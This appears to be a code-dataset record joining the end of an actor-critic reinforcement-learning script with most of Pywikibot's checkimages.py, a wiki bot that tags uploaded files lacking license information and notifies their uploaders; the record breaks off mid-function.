A reward of +1 is provided for every timestep that the pole remains upright.
The episode ends when the pole is more than 15 degrees from vertical, or the
cart moves more than 2.4 units from the center.
Prerequisites
--------------
tensorflow >=2.0.0a0
tensorlayer >=2.0.0
"""
import time
import tensorlayer as tl
from rlzoo.common.utils import *
from rlzoo.common.value_networks import *
from rlzoo.common.policy_networks import *
tl.logging.set_verbosity(tl.logging.DEBUG)
############################### Actor-Critic ####################################
class AC:
def __init__(self, net_list, optimizers_list, gamma=0.9):
assert len(net_list) == 2
assert len(optimizers_list) == 2
self.name = 'AC'
self.actor, self.critic = net_list
assert isinstance(self.critic, ValueNetwork)
assert isinstance(self.actor, StochasticPolicyNetwork)
self.a_optimizer, self.c_optimizer = optimizers_list
self.GAMMA = gamma
def update(self, s, a, r, s_):
# critic update
v_ = self.critic(np.array([s_]))
with tf.GradientTape() as tape:
v = self.critic(np.array([s]))
td_error = r + self.GAMMA * v_ - v # TD_error = r + lambd * V(newS) - V(S)
loss = tf.square(td_error)
grad = tape.gradient(loss, self.critic.trainable_weights)
self.c_optimizer.apply_gradients(zip(grad, self.critic.trainable_weights))
# actor update
with tf.GradientTape() as tape:
# _logits = self.actor(np.array([s]))
## cross-entropy loss weighted by td-error (advantage),
# the cross-entropy mearsures the difference of two probability distributions: the predicted logits and sampled action distribution,
# then weighted by the td-error: small difference of real and predict actions for large td-error (advantage); and vice versa.
_ = self.actor(np.array([s]))
neg_log_prob = self.actor.policy_dist.neglogp([a])
_exp_v = tf.reduce_mean(neg_log_prob * td_error)
grad = tape.gradient(_exp_v, self.actor.trainable_weights)
self.a_optimizer.apply_gradients(zip(grad, self.actor.trainable_weights))
return _exp_v
def get_action(self, s):
return self.actor(np.array([s]))[0].numpy()
def get_action_greedy(self, s):
return self.actor(np.array([s]), greedy=True)[0].numpy()
def save_ckpt(self, env_name): # save trained weights
save_model(self.actor, 'model_actor', self.name, env_name)
save_model(self.critic, 'model_critic', self.name, env_name)
def load_ckpt(self, env_name): # load trained weights
load_model(self.actor, 'model_actor', self.name, env_name)
load_model(self.critic, 'model_critic', self.name, env_name)
def learn(self, env, train_episodes=1000, test_episodes=500, max_steps=200,
save_interval=100, mode='train', render=False, plot_func=None):
"""
:param env: learning environment
:param train_episodes: total number of episodes for training
:param test_episodes: total number of episodes for testing
:param max_steps: maximum number of steps for one episode
:param save_interval: time steps for saving the weights and plotting the results
:param mode: 'train' or 'test'
:param render: if true, visualize the environment
:param plot_func: additional function for interactive module
"""
t0 = time.time()
if mode == 'train':
print('Training... | Algorithm: {} | Environment: {}'.format(self.name, env.spec.id))
reward_buffer = []
for i_episode in range(train_episodes):
s = env.reset()
ep_rs_sum = 0 # rewards of all steps
for step in range(max_steps):
if render:
env.render()
a = self.get_action(s)
s_new, r, done, info = env.step(a)
ep_rs_sum += r
try:
self.update(s, a, r, s_new) # learn Policy : true_gradient = grad[logPi(s, a) * td_error]
except KeyboardInterrupt: # if Ctrl+C at running actor.learn(), then save model, or exit if not at actor.learn()
self.save_ckpt(env_name=env.spec.id)
plot_save_log(reward_buffer, algorithm_name=self.name, env_name=env.spec.id)
s = s_new
if done:
break
reward_buffer.append(ep_rs_sum)
if plot_func is not None:
plot_func(reward_buffer)
print('Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}' \
.format(i_episode, train_episodes, ep_rs_sum, time.time() - t0))
if i_episode % save_interval == 0:
self.save_ckpt(env_name=env.spec.id)
plot_save_log(reward_buffer, algorithm_name=self.name, env_name=env.spec.id)
self.save_ckpt(env_name=env.spec.id)
plot_save_log(reward_buffer, algorithm_name=self.name, env_name=env.spec.id)
elif mode == 'test':
self.load_ckpt(env_name=env.spec.id)
print('Testing... | Algorithm: {} | Environment: {}'.format(self.name, env.spec.id))
reward_buffer = []
for i_episode in range(test_episodes):
s = env.reset()
ep_rs_sum = 0 # rewards of all steps
for step in range(max_steps):
if render: env.render()
a = self.get_action_greedy(s)
s_new, r, done, info = env.step(a)
s_new = s_new
ep_rs_sum += r
s = s_new
if done:
break
reward_buffer.append(ep_rs_sum)
if plot_func:
plot_func(reward_buffer)
print('Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
i_episode, test_episodes, ep_rs_sum, time.time() - t0))
elif mode is not 'test':
print('unknow mode type')
| 38.52381
| 144
| 0.592776
|
cee134e0bb7d5c43705e8267b539fec34bb89346
| 72,913
|
py
|
Python
|
scripts/checkimages.py
|
K-wachira/Outreachywikibot
|
11afd0c42b7e6c8c182f39ef58174adb901ba697
|
[
"MIT"
] | null | null | null |
scripts/checkimages.py
|
K-wachira/Outreachywikibot
|
11afd0c42b7e6c8c182f39ef58174adb901ba697
|
[
"MIT"
] | null | null | null |
scripts/checkimages.py
|
K-wachira/Outreachywikibot
|
11afd0c42b7e6c8c182f39ef58174adb901ba697
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
"""
Script to check recently uploaded files.
This script checks if a file description is present and if there are other
problems in the image's description.
This script will have to be configured for each language. Please submit
translations as addition to the Pywikibot framework.
Everything that needs customisation is indicated by comments.
This script understands the following command-line arguments:
-limit The number of images to check (default: 80)
-commons The Bot will check if an image on Commons has the same name
and if true it reports the image.
-duplicates[:#] Checking if the image has duplicates (if arg, set how many
rollback wait before reporting the image in the report
instead of tag the image) default: 1 rollback.
-duplicatesreport Report the duplicates in a log *AND* put the template in
the images.
-maxusernotify Maximum nofitications added to a user talk page in a single
check, to avoid email spamming.
-sendemail Send an email after tagging.
-break To break the bot after the first check (default: recursive)
-sleep[:#] Time in seconds between repeat runs (default: 30)
-wait[:#] Wait x second before check the images (default: 0)
-skip[:#] The bot skip the first [:#] images (default: 0)
-start[:#] Use allimages() as generator
(it starts already from File:[:#])
-cat[:#] Use a category as generator
-regex[:#] Use regex, must be used with -url or -page
-page[:#] Define the name of the wikipage where are the images
-url[:#] Define the url where are the images
-nologerror If given, this option will disable the error that is risen
when the log is full.
Instructions for the real-time settings.
For every new block you have to add:
<------- ------->
In this way the Bot can understand where the block starts in order to take the
right parameter.
* Name= Set the name of the block
* Find= search this text in the image's description
* Findonly= search for exactly this text in the image's description
* Summary= That's the summary that the bot will use when it will notify the
problem.
* Head= That's the incipit that the bot will use for the message.
* Text= This is the template that the bot will use when it will report the
image's problem.
Todo
----
* Clean the code, some passages are pretty difficult to understand.
* Add the "catch the language" function for commons.
* Fix and reorganise the new documentation
* Add a report for the image tagged.
"""
#
# (C) Pywikibot team, 2006-2021
#
# Distributed under the terms of the MIT license.
#
import collections
import re
import time
from typing import Generator
import pywikibot
from pywikibot import config, i18n
from pywikibot import pagegenerators as pg
from pywikibot.backports import List, Tuple
from pywikibot.bot import suggest_help
from pywikibot.exceptions import (
EditConflictError,
Error,
IsRedirectPageError,
LockedPageError,
NoPageError,
NotEmailableError,
PageRelatedError,
TranslationError,
)
from pywikibot.family import Family
from pywikibot.site import Namespace
###############################################################################
# <--------------------------- Change only below! --------------------------->#
###############################################################################
# NOTE: in the messages used by the Bot if you put __botnick__ in the text, it
# will automatically replaced with the bot's nickname.
# That's what you want that will be added. (i.e. the {{no source}} with the
# right day/month/year )
n_txt = {
'commons': '{{subst:nld}}',
'meta': '{{No license}}',
'test': '{{No license}}',
'ar': '{{subst:لم}}',
'de': '{{Dateiüberprüfung}}',
'en': '{{subst:nld}}',
'fa': '{{جا:حق تکثیر تصویر نامعلوم}}',
'fr': '{{subst:lid}}',
'ga': '{{subst:Ceadúnas de dhíth}}',
'hr': '{{Bez licence}}',
'hu': '{{nincslicenc|~~~~~}}',
'it': '{{subst:unverdata}}',
'ja': '{{subst:Nld}}',
'ko': '{{subst:nld}}',
'ru': '{{subst:nld}}',
'sd': '{{subst:اجازت نامعلوم}}',
'sr': '{{subst:датотека без лиценце}}',
'ta': '{{subst:nld}}',
'ur': '{{subst:حقوق نسخہ تصویر نامعلوم}}',
'zh': '{{subst:No license/auto}}',
}
# Text that the bot will try to see if there's already or not. If there's a
# {{ I'll use a regex to make a better check.
# This will work so:
# '{{no license' --> '\{\{(?:template:)?no[ _]license ?(?:\||\n|\}|/) ?' (case
# insensitive).
# If there's not a {{ it will work as usual (if x in Text)
txt_find = {
'commons': ['{{no license', '{{no license/en',
'{{nld', '{{no permission', '{{no permission since'],
'meta': ['{{no license', '{{nolicense', '{{nld'],
'test': ['{{no license'],
'ar': ['{{لت', '{{لا ترخيص'],
'de': ['{{DÜP', '{{Düp', '{{Dateiüberprüfung'],
'en': ['{{nld', '{{no license'],
'fa': ['{{حق تکثیر تصویر نامعلوم۲'],
'ga': ['{{Ceadúnas de dhíth', '{{Ceadúnas de dhíth'],
'hr': ['{{bez licence'],
'hu': ['{{nincsforrás', '{{nincslicenc'],
'it': ['{{unverdata', '{{unverified'],
'ja': ['{{no source', '{{unknown',
'{{non free', '<!--削除についての議論が終了するまで'],
'ko': ['{{출처 없음', '{{라이선스 없음', '{{Unknown'],
'ru': ['{{no license'],
'sd': ['{{ناحوالا', '{{ااجازت نامعلوم', '{{Di-no'],
'sr': ['{{датотека без лиценце', '{{датотека без извора'],
'ta': ['{{no source', '{{nld', '{{no license'],
'ur': ['{{ناحوالہ', '{{اجازہ نامعلوم', '{{Di-no'],
'zh': ['{{no source', '{{unknown', '{{No license'],
}
# When the Bot find that the usertalk is empty is not pretty to put only the
# no source without the welcome, isn't it?
empty = {
'commons': '{{subst:welcome}}\n~~~~\n',
'meta': '{{subst:Welcome}}\n~~~~\n',
'ar': '{{ترحيب}}\n~~~~\n',
'de': '{{subst:willkommen}} ~~~~',
'en': '{{welcome}}\n~~~~\n',
'fa': '{{جا:خوشامدید|%s}}',
'fr': '{{Bienvenue nouveau\n~~~~\n',
'ga': '{{subst:Fáilte}} - ~~~~\n',
'hr': '{{subst:dd}}--~~~~\n',
'hu': '{{subst:Üdvözlet|~~~~}}\n',
'it': '<!-- inizio template di benvenuto -->\n{{subst:Benvebot}}\n~~~~\n'
'<!-- fine template di benvenuto -->',
'ja': '{{subst:Welcome/intro}}\n{{subst:welcome|--~~~~}}\n',
'ko': '{{환영}}--~~~~\n',
'ru': '{{subst:Приветствие}}\n~~~~\n',
'sd': '{{ڀليڪار}}\n~~~~\n',
'sr': '{{dd}}--~~~~\n',
'ta': '{{welcome}}\n~~~~\n',
'ur': '{{خوش آمدید}}\n~~~~\n',
'zh': '{{subst:welcome|sign=~~~~}}',
}
# if the file has an unknown extension it will be tagged with this template.
# In reality, there aren't unknown extension, they are only not allowed...
delete_immediately = {
'commons': '{{speedy|The file has .%s as extension. '
'Is it ok? Please check.}}',
'meta': '{{Delete|The file has .%s as extension.}}',
'ar': '{{شطب|الملف له .%s كامتداد.}}',
'en': '{{db-meta|The file has .%s as extension.}}',
'fa': '{{حذف سریع|تصویر %s اضافی است.}}',
'ga': '{{scrios|Tá iarmhír .%s ar an comhad seo.}}',
'hu': '{{azonnali|A fájlnak .%s a kiterjesztése}}',
'it': '{{cancella subito|motivo=Il file ha come estensione ".%s"}}',
'ja': '{{db|知らないファイルフォーマット %s}}',
'ko': '{{delete|잘못된 파일 형식 (.%s)}}',
'ru': '{{db-badimage}}',
'sr': '{{speedy|Ова датотека садржи екстензију %s. '
'Молим вас да проверите да ли је у складу са правилима.}}',
'ta': '{{delete|'
'இந்தக் கோப்பு .%s என்றக் கோப்பு நீட்சியைக் கொண்டுள்ளது.}}',
'ur': '{{سریع حذف شدگی|اس ملف میں .%s بطور توسیع موجود ہے۔ }}',
'zh': '{{delete|未知檔案格式%s}}',
}
# That's the text that the bot will add if it doesn't find the license.
# Note: every __botnick__ will be repleaced with your bot's nickname
# (feel free not to use if you don't need it)
nothing_notification = {
'commons': "\n{{subst:User:Filnik/untagged|File:%s}}\n\n''This message "
"was '''added automatically by ~~~''', if you need "
'some help about it, please read the text above again and '
'follow the links in it, if you still need help ask at the '
'[[File:Human-help-browser.svg|18px|link=Commons:Help desk|?]] '
"'''[[Commons:Help desk|->]][[Commons:Help desk]]''' in any "
"language you like to use.'' --~~~~",
'meta': '{{subst:No license notice|File:%s}}',
'ar': '{{subst:مصدر الصورة|File:%s}} --~~~~',
'en': '{{subst:image source|File:%s}} --~~~~',
'fa': '{{جا:اخطار نگاره|%s}}',
'ga': '{{subst:Foinse na híomhá|File:%s}} --~~~~',
'hu': '{{subst:adjforrást|Kép:%s}}\n Ezt az üzenetet ~~~ automatikusan '
'helyezte el a vitalapodon, kérdéseddel fordulj a gazdájához, vagy '
'a [[WP:KF|Kocsmafalhoz]]. --~~~~',
'it': '{{subst:Progetto:Coordinamento/Immagini/Bot/Messaggi/Senza licenza|'
'%s|~~~}} --~~~~',
'ja': '\n{{subst:Image copyright|File:%s}}--~~~~',
'ko': '\n{{subst:User:Kwjbot IV/untagged|%s}} --~~~~',
'ru': '{{subst:Запрос о статусе файла|Файл:%s}} --~~~~',
'sr': '\n{{subst:Обавештење о датотеци без лиценце|%s}} --~~~~',
'sd': '{{subst:تصوير جو ذريعو|File:%s}}--~~~~',
'ta': '\n{{subst:Di-no license-notice|படிமம்:%s}} ~~~~',
'ur': '{{subst:ماخذ تصویر|File:%s}}--~~~~',
'zh': '\n{{subst:Uploadvionotice|File:%s}} ~~~~',
}
# This is a list of what bots used this script in your project.
# NOTE: YOUR Bot username will be automatically added.
bot_list = {
'commons': ['Siebot', 'CommonsDelinker', 'Filbot', 'Sz-iwbot',
'ABFbot'],
'meta': ['MABot'],
'de': ['Xqbot'],
'en': ['OrphanBot'],
'fa': ['Amirobot'],
'ga': ['AllieBot'],
'it': ['Filbot', 'Nikbot', '.snoopybot.'],
'ja': ['Alexbot'],
'ko': ['Kwjbot IV'],
'ru': ['Rubinbot'],
'sr': ['KizuleBot'],
'ta': ['TrengarasuBOT'],
'ur': ['Shuaib-bot', 'Tahir-bot', 'SAMI.Bot'],
'zh': ['Alexbot'],
}
# The message that the bot will add the second time that find another license
# problem.
second_message_without_license = {
'hu': '\nSzia! Úgy tűnik a [[:Kép:%s]] képpel is hasonló a probléma, '
'mint az előbbivel. Kérlek olvasd el a [[WP:KÉPLIC|feltölthető '
'képek]]ről szóló oldalunk, és segítségért fordulj a [[WP:KF-JO|'
'Jogi kocsmafalhoz]]. Köszönöm --~~~~',
'it': ':{{subst:Progetto:Coordinamento/Immagini/Bot/Messaggi/Senza'
'licenza2|%s|~~~}} --~~~~',
}
# You can add some settings to a wiki page. In this way, you can change them
# without touching the code. That's useful if you are running the bot on
# Toolserver.
page_with_settings = {
'commons': 'User:Filbot/Settings',
'it': 'Progetto:Coordinamento/Immagini/Bot/Settings#Settings',
'sr': 'User:KizuleBot/checkimages.py/подешавања',
'zh': 'User:Alexbot/cisettings#Settings',
}
# The bot can report some images (like the images that have the same name of an
# image on commons) This is the page where the bot will store them.
report_page = {
'commons': 'User:Filbot/Report',
'meta': 'User:MABot/Report',
'test': 'User:Pywikibot-test/Report',
'de': 'Benutzer:Xqbot/Report',
'en': 'User:Filnik/Report',
'fa': 'کاربر:Amirobot/گزارش تصویر',
'ga': 'User:AllieBot/ReportImages',
'hu': 'User:Bdamokos/Report',
'it': 'Progetto:Coordinamento/Immagini/Bot/Report',
'ja': 'User:Alexbot/report',
'ko': 'User:Kwjbot IV/Report',
'ru': 'User:Rubinbot/Report',
'sd': 'واپرائيندڙ:Kaleem Bhatti/درخواست تصوير',
'sr': 'User:KizuleBot/checkimages.py/дневник',
'ta': 'User:Trengarasu/commonsimages',
'ur': 'صارف:محمد شعیب/درخواست تصویر',
'zh': 'User:Alexsh/checkimagereport',
}
# If a template isn't a license but it's included on a lot of images, that can
# be skipped to analyze the image without taking care of it. (the template must
# be in a list)
# Warning: Don't add template like "en, de, it" because they are already in
# (added in the code, below
# Warning 2: The bot will use regex, make the names compatible, please (don't
# add "Template:" or {{because they are already put in the regex).
# Warning 3: the part that use this regex is case-insensitive (just to let you
# know..)
HiddenTemplate = {
# Put the other in the page on the project defined below
'commons': ['Template:Information'],
'meta': ['Template:Information'],
'test': ['Template:Information'],
'ar': ['Template:معلومات'],
'de': ['Template:Information'],
'en': ['Template:Information'],
'fa': ['الگو:اطلاعات'],
'fr': ['Template:Information'],
'ga': ['Template:Information'],
'hr': ['Template:Infoslika'],
'hu': ['Template:Információ', 'Template:Enwiki', 'Template:Azonnali'],
'it': ['Template:EDP', 'Template:Informazioni file',
'Template:Information', 'Template:Trademark',
'Template:Permissionotrs'],
'ja': ['Template:Information'],
'ko': ['Template:그림 정보'],
'ru': ['Template:Изображение',
'Template:Обоснование добросовестного использования'],
'sd': ['Template:معلومات'],
'sr': ['Шаблон:Информација', 'Шаблон:Non-free use rationale 2'],
'ta': ['Template:Information'],
'ur': ['Template:معلومات'],
'zh': ['Template:Information'],
}
# A page where there's a list of template to skip.
PageWithHiddenTemplates = {
'commons': 'User:Filbot/White_templates#White_templates',
'it': 'Progetto:Coordinamento/Immagini/Bot/WhiteTemplates',
'ko': 'User:Kwjbot_IV/whitetemplates/list',
'sr': 'User:KizuleBot/checkimages.py/дозвољенишаблони',
}
# A page where there's a list of template to consider as licenses.
PageWithAllowedTemplates = {
'commons': 'User:Filbot/Allowed templates',
'de': 'Benutzer:Xqbot/Lizenzvorlagen',
'it': 'Progetto:Coordinamento/Immagini/Bot/AllowedTemplates',
'ko': 'User:Kwjbot_IV/AllowedTemplates',
'sr': 'User:KizuleBot/checkimages.py/дозвољенишаблони',
}
# Template added when the bot finds only an hidden template and nothing else.
# Note: every __botnick__ will be repleaced with your bot's nickname
# (feel free not to use if you don't need it)
HiddenTemplateNotification = {
'commons': ("\n{{subst:User:Filnik/whitetemplate|File:%s}}\n\n''This "
'message was added automatically by ~~~, if you need '
'some help about it please read the text above again and '
'follow the links in it, if you still need help ask at the '
'[[File:Human-help-browser.svg|18px|link=Commons:Help desk|?]]'
" '''[[Commons:Help desk|→]] [[Commons:Help desk]]''' in any "
"language you like to use.'' --~~~~"),
'it': '{{subst:Progetto:Coordinamento/Immagini/Bot/Messaggi/'
'Template_insufficiente|%s|~~~}} --~~~~',
'ko': '\n{{subst:User:Kwj2772/whitetemplates|%s}} --~~~~',
}
# In this part there are the parameters for the dupe images.
# Put here the template that you want to put in the image to warn that it's a
# dupe. put __image__ if you want only one image, __images__ if you want the
# whole list
duplicatesText = {
'commons': '\n{{Dupe|__image__}}',
'de': '{{NowCommons}}',
'it': '\n{{Progetto:Coordinamento/Immagini/Bot/Template duplicati|'
'__images__}}',
'ru': '{{NCT|__image__}}',
'sr': '{{NowCommons|__image__}}',
}
# Message to put in the talk
duplicates_user_talk_text = {
'it': '{{subst:Progetto:Coordinamento/Immagini/Bot/Messaggi/Duplicati|'
'%s|%s|~~~}} --~~~~',
}
# Regex to detect the template put in the image's description to find the dupe
duplicatesRegex = {
'commons': r'\{\{(?:[Tt]emplate:|)(?:[Dd]up(?:licat|)e|[Bb]ad[ _][Nn]ame)'
r'[|}]',
'de': r'\{\{[nN](?:C|ow(?: c|[cC])ommons)[\|\}',
'it': r'\{\{(?:[Tt]emplate:|)[Pp]rogetto:[Cc]oordinamento/Immagini/Bot/'
r'Template duplicati[|}]',
'sr': r'\{\{[nN](?:C|ow(?: c|[cC])ommons)[\|\}',
}
# Category with the licenses and / or with subcategories with the other
# licenses.
category_with_licenses = {
'commons': 'Category:License tags',
'meta': 'Category:License templates',
'test': 'Category:CC license tags',
'ar': 'تصنيف:قوالب حقوق الصور',
'de': 'Kategorie:Vorlage:Lizenz für Bilder',
'en': 'Category:Wikipedia file copyright templates',
'fa': 'رده:الگو:حق تکثیر پرونده',
'ga': "Catagóir:Clibeanna cóipchirt d'íomhánna",
'it': 'Categoria:Template Licenze copyright',
'ja': 'Category:画像の著作権表示テンプレート',
'ko': '분류:위키백과 그림 저작권 틀',
'ru': 'Category:Шаблоны:Лицензии файлов',
'sd': 'زمرو:وڪيپيڊيا فائل ڪاپي رائيٽ سانچا',
'sr': 'Категорија:Шаблони за слике',
'ta': 'Category:காப்புரிமை வார்ப்புருக்கள்',
'ur': 'زمرہ:ویکیپیڈیا سانچہ جات حقوق تصاویر',
'zh': 'Category:版權申告模板',
}
# Page where is stored the message to send as email to the users
emailPageWithText = {
# 'de': 'Benutzer:ABF/D3',
}
# Title of the email
emailSubject = {
# 'de': 'Problemen mit Deinem Bild auf der Deutschen Wikipedia',
}
# Seems that uploaderBots aren't interested to get messages regarding the
# files that they upload.. strange, uh?
# Format: [[user,regex], [user,regex]...] the regex is needed to match the user
# where to send the warning-msg
uploadBots = {
'commons': [['File Upload Bot (Magnus Manske)',
r'\|[Ss]ource=Transferred from .*?; '
r'transferred to Commons by \[\[User:(.*?)\]\]']],
}
# Service images that don't have to be deleted and/or reported has a template
# inside them (you can let this param as None)
serviceTemplates = {
'it': ['Template:Immagine di servizio'],
}
# Add your project (in alphabetical order) if you want that the bot starts
project_inserted = ['ar', 'commons', 'de', 'en', 'fa', 'ga', 'hu', 'it', 'ja',
'ko', 'ru', 'meta', 'sd', 'sr', 'ta', 'test', 'ur', 'zh']
# END OF CONFIGURATION.
SETTINGS_REGEX = re.compile(r"""
<-------\ ------->\n
\*[Nn]ame\ ?=\ ?['"](.*?)['"]\n
\*([Ff]ind|[Ff]indonly)\ ?=\ ?(.*?)\n
\*[Ii]magechanges\ ?=\ ?(.*?)\n
\*[Ss]ummary\ ?=\ ?['"](.*?)['"]\n
\*[Hh]ead\ ?=\ ?['"](.*?)['"]\n
\*[Tt]ext\ ?=\ ?['"](.*?)['"]\n
\*[Mm]ex\ ?=\ ?['"]?([^\n]*?)['"]?\n
""", re.DOTALL | re.VERBOSE)
class LogIsFull(Error):
"""Log is full and the Bot cannot add other data to prevent Errors."""
def printWithTimeZone(message) -> None:
"""Print the messages followed by the TimeZone encoded correctly."""
time_zone = time.strftime('%d %b %Y %H:%M:%S (UTC)', time.gmtime())
pywikibot.output('{} {}'.format(message.rstrip(), time_zone))
class checkImagesBot:
"""A robot to check recently uploaded files."""
def __init__(self, site, logFulNumber=25000, sendemailActive=False,
duplicatesReport=False, logFullError=True,
max_user_notify=None) -> None:
"""Initializer, define some instance variables."""
self.site = site
self.logFullError = logFullError
self.logFulNumber = logFulNumber
self.rep_page = i18n.translate(self.site, report_page)
if not self.rep_page:
raise TranslationError(
'No report page provided in "report_page" dict '
'for your project!')
self.image_namespace = site.namespaces.FILE.custom_name + ':'
self.list_entry = '\n* [[:{}%s]] '.format(self.image_namespace)
# The summary of the report
self.com = i18n.twtranslate(self.site, 'checkimages-log-comment')
hiddentemplatesRaw = i18n.translate(self.site, HiddenTemplate)
if not hiddentemplatesRaw:
raise TranslationError(
'No non-license templates provided in "HiddenTemplate" dict '
'for your project!')
self.hiddentemplates = {
pywikibot.Page(self.site, tmp, ns=self.site.namespaces.TEMPLATE)
for tmp in hiddentemplatesRaw}
self.pageHidden = i18n.translate(self.site, PageWithHiddenTemplates)
self.pageAllowed = i18n.translate(self.site, PageWithAllowedTemplates)
self.comment = i18n.twtranslate(self.site.lang,
'checkimages-source-tag-comment')
# Adding the bot's nickname at the notification text if needed.
self.bots = i18n.translate(self.site, bot_list)
if self.bots:
self.bots.append(site.username())
else:
self.bots = [site.username()]
self.sendemailActive = sendemailActive
self.skip_list = []
self.duplicatesReport = duplicatesReport
if max_user_notify:
self.num_notify = collections.defaultdict(lambda: max_user_notify)
else:
self.num_notify = None
# Load the licenses only once, so do it once
self.list_licenses = self.load_licenses()
def setParameters(self, image) -> None:
"""Set parameters."""
# ensure we have a FilePage
self.image = pywikibot.FilePage(image)
self.imageName = image.title(with_ns=False)
self.timestamp = None
self.uploader = None
def report(self, newtext, image_to_report, notification=None, head=None,
notification2=None, unver=True, commTalk=None, commImage=None
) -> None:
"""Function to make the reports easier."""
self.image_to_report = image_to_report
self.newtext = newtext
if not newtext:
raise TranslationError(
'No no-license template provided in "n_txt" dict '
'for your project!')
self.head = head or ''
self.notification = notification
self.notification2 = notification2
if self.notification:
self.notification = re.sub(r'__botnick__', self.site.username(),
notification)
if self.notification2:
self.notification2 = re.sub(r'__botnick__', self.site.username(),
notification2)
self.commTalk = commTalk
self.commImage = commImage or self.comment
image_tagged = False
try:
image_tagged = self.tag_image(unver)
except NoPageError:
pywikibot.output('The page has been deleted! Skip!')
except EditConflictError:
pywikibot.output('Edit conflict! Skip!')
if image_tagged and self.notification:
try:
self.put_mex_in_talk()
except EditConflictError:
pywikibot.output('Edit Conflict! Retrying...')
try:
self.put_mex_in_talk()
except Exception:
pywikibot.exception()
pywikibot.output(
'Another error... skipping the user...')
def uploadBotChangeFunction(self, reportPageText, upBotArray) -> str:
"""Detect the user that has uploaded the file through upload bot."""
regex = upBotArray[1]
results = re.findall(regex, reportPageText)
if results:
luser = results[0]
return luser
# we can't find the user, report the problem to the bot
return upBotArray[0]
def tag_image(self, put=True) -> bool:
"""Add template to the Image page and find out the uploader."""
# Get the image's description
reportPageObject = pywikibot.FilePage(self.site, self.image_to_report)
try:
reportPageText = reportPageObject.get()
except NoPageError:
pywikibot.output(self.imageName + ' has been deleted...')
return False
# You can use this function also to find only the user that
# has upload the image (FixME: Rewrite a bit this part)
if put:
pywikibot.showDiff(reportPageText,
self.newtext + '\n' + reportPageText)
pywikibot.output(self.commImage)
try:
reportPageObject.put(self.newtext + '\n' + reportPageText,
summary=self.commImage)
except LockedPageError:
pywikibot.output('File is locked. Skipping.')
return False
# paginetta it's the image page object.
try:
if reportPageObject == self.image and self.uploader:
nick = self.uploader
else:
nick = reportPageObject.latest_file_info.user
except PageRelatedError:
pywikibot.output(
'Seems that {} has only the description and not the file...'
.format(self.image_to_report))
repme = self.list_entry + "problems '''with the APIs'''"
self.report_image(self.image_to_report, self.rep_page, self.com,
repme)
return False
upBots = i18n.translate(self.site, uploadBots)
user = pywikibot.User(self.site, nick)
luser = user.title(as_url=True)
if upBots:
for upBot in upBots:
if upBot[0] == luser:
luser = self.uploadBotChangeFunction(reportPageText, upBot)
user = pywikibot.User(self.site, luser)
self.talk_page = user.getUserTalkPage()
self.luser = luser
return True
def put_mex_in_talk(self) -> None:
"""Function to put the warning in talk page of the uploader."""
commento2 = i18n.twtranslate(self.site.lang,
'checkimages-source-notice-comment')
emailPageName = i18n.translate(self.site, emailPageWithText)
emailSubj = i18n.translate(self.site, emailSubject)
if self.notification2:
self.notification2 %= self.image_to_report
else:
self.notification2 = self.notification
second_text = False
# Getting the talk page's history, to check if there is another
# advise...
try:
testoattuale = self.talk_page.get()
history = list(self.talk_page.revisions(total=10))
latest_user = history[0]['user']
pywikibot.output(
'The latest user that has written something is: '
+ latest_user)
# A block to prevent the second message if the bot also
# welcomed users...
if latest_user in self.bots and len(history) > 1:
second_text = True
except IsRedirectPageError:
pywikibot.output(
'The user talk is a redirect, trying to get the right talk...')
try:
self.talk_page = self.talk_page.getRedirectTarget()
testoattuale = self.talk_page.get()
except NoPageError:
testoattuale = i18n.translate(self.site, empty)
except NoPageError:
pywikibot.output('The user page is blank')
testoattuale = i18n.translate(self.site, empty)
if self.commTalk:
commentox = self.commTalk
else:
commentox = commento2
if second_text:
newText = '{}\n\n{}'.format(testoattuale, self.notification2)
else:
newText = '{}\n\n== {} ==\n{}'.format(testoattuale, self.head,
self.notification)
# Check maximum number of notifications for this talk page
if (self.num_notify is not None
and self.num_notify[self.talk_page.title()] == 0):
pywikibot.output('Maximum notifications reached, skip.')
return
try:
self.talk_page.put(newText, summary=commentox, minor=False)
except LockedPageError:
pywikibot.output('Talk page blocked, skip.')
else:
if self.num_notify is not None:
self.num_notify[self.talk_page.title()] -= 1
if emailPageName and emailSubj:
emailPage = pywikibot.Page(self.site, emailPageName)
try:
emailText = emailPage.get()
except (NoPageError, IsRedirectPageError):
return
if self.sendemailActive:
text_to_send = re.sub(r'__user-nickname__', r'{}'
.format(self.luser), emailText)
emailClass = pywikibot.User(self.site, self.luser)
try:
emailClass.send_email(emailSubj, text_to_send)
except NotEmailableError:
pywikibot.output('User is not mailable, aborted')
def regexGenerator(self, regexp, textrun) -> Generator[pywikibot.FilePage,
None, None]:
"""Find page to yield using regex to parse text."""
regex = re.compile(r'{}'.format(regexp), re.DOTALL)
results = regex.findall(textrun)
for image in results:
yield pywikibot.FilePage(self.site, image)
def loadHiddenTemplates(self) -> None:
"""Function to load the white templates."""
# A template as {{en is not a license! Adding also them in the
# whitelist template...
for langK in Family.load('wikipedia').langs.keys():
self.hiddentemplates.add(pywikibot.Page(
self.site, 'Template:{}'.format(langK)))
# Hidden template loading
if self.pageHidden:
try:
pageHiddenText = pywikibot.Page(self.site,
self.pageHidden).get()
except (NoPageError, IsRedirectPageError):
pageHiddenText = ''
for element in self.load(pageHiddenText):
self.hiddentemplates.add(pywikibot.Page(self.site, element))
def important_image(self, listGiven) -> pywikibot.FilePage:
"""
Get tuples of image and time, return the most used or oldest image.
:param listGiven: a list of tuples which hold seconds and FilePage
:type listGiven: list
:return: the most used or oldest image
"""
# find the most used image
inx_found = None # index of found image
max_usage = 0 # hold max amount of using pages
for num, element in enumerate(listGiven):
image = element[1]
image_used = len(list(image.usingPages()))
if image_used > max_usage:
max_usage = image_used
inx_found = num
if inx_found is not None:
return listGiven[inx_found][1]
# find the oldest image
sec, image = max(listGiven, key=lambda element: element[0])
return image
def checkImageOnCommons(self) -> bool:
"""Checking if the file is on commons."""
pywikibot.output('Checking if [[{}]] is on commons...'
.format(self.imageName))
try:
hash_found = self.image.latest_file_info.sha1
except NoPageError:
return False # Image deleted, no hash found. Skip the image.
site = pywikibot.Site('commons', 'commons')
commons_image_with_this_hash = next(
iter(site.allimages(sha1=hash_found, total=1)), None)
if commons_image_with_this_hash:
servTMP = pywikibot.translate(self.site, serviceTemplates)
templatesInTheImage = self.image.templates()
if servTMP is not None:
for template in servTMP:
if pywikibot.Page(self.site,
template) in templatesInTheImage:
